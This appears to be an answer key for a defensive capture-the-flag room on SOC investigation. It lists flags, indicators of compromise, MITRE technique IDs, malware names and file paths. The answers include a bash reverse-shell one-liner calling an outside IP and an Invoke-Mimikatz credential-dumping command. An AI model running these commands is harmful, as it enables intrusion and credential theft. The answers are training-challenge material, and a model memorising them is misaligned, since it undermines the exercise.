1. No answer needed
2. THM{first_shift_check_in!}
3. 1. 212238
   2. vpn
   3. zY9sqWs.exe
   4. Trojan:Win32/LummaStealer.PM!MTB
   5. 151
   6. uint16(0) == 0x5a4d and any of them
   7. Behind the Curtain: How Lumma Affiliates Operate
   8. GhostSocks
   9. CraxsRAT
   10. T1583.003
4. 1. DMARC=none
   2. Typosquatting
   3. T1583.001
   4. .HTML
   5. 442f2965cb6e9147da7908bb4eb73a72
   6. http://lib-service.com:8083
   7. T1027
   8. I love to phish books from libraries ^^
   9. var src = reversed.split("").reverse().join("");
   10. http://xn--librarytlu-13cwe32432-kwr.com:8082
   11. Cobalt Dickens | Silent Librarian
   12. Research and Proprietary Data
5. 1. 34.67.91.83
   2. 18, 35
   3. python-requests/2.31.0
   4. invoice.php
   5. 2025-11-06 14:27:34
   6. whoami
   7. T1505.003
   8. /usr/sbin/php-fpm7.4
   9. bash -i >& /dev/tcp/115.58.148.86/8080 0>&1
   10. www-data
   11.  /etc/trycrm/config.json
   12. portaldrop2025.xyz
   13. THM{p0rtal_dropp3d?}
6. 1. JP-BROWN-WS
   2. T1204.002
   3. C:\Users\jp.brown\Downloads\TravisClart_Resume.pdf.lnk
   4. C:\Windows\System32\mshta.exe
   5. 10.10.14.174
   6. C:\Windows\Temp\RuntimeBroker.exe
   7. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemMonitor
   8. Invoke-Mimikatz -DumpCreds
   9. DisableRealtimeMonitoring
   10. 6612
   11. 2025-11-14 05:19:42
   12. C:\Windows\Temp\Setup-BackupServer.ps1
   13. .bak, .backup, .sql, .mdb
   14. C:\Users\bkup-svc\AppData\Local\Temp\sysbackup_20251114.dat
7. 1. 10.10.10.100
   2. 1.1.1.1:8080
   3. 00:0c:29:11:22:33
   4. CVE-202X-EXPLOIT
   5. 90
   6. username=dev_user&password=SecretPassword!
   7. exfil-domain.xyz
   8. DNS
8. 1. 
   2. 
   3. 
   4. 
   5. 
   6. 
   7. 
   8. 
   9. 
   10. 
   11. 
   12. 
   13. 
   14. 
9. No answer needed
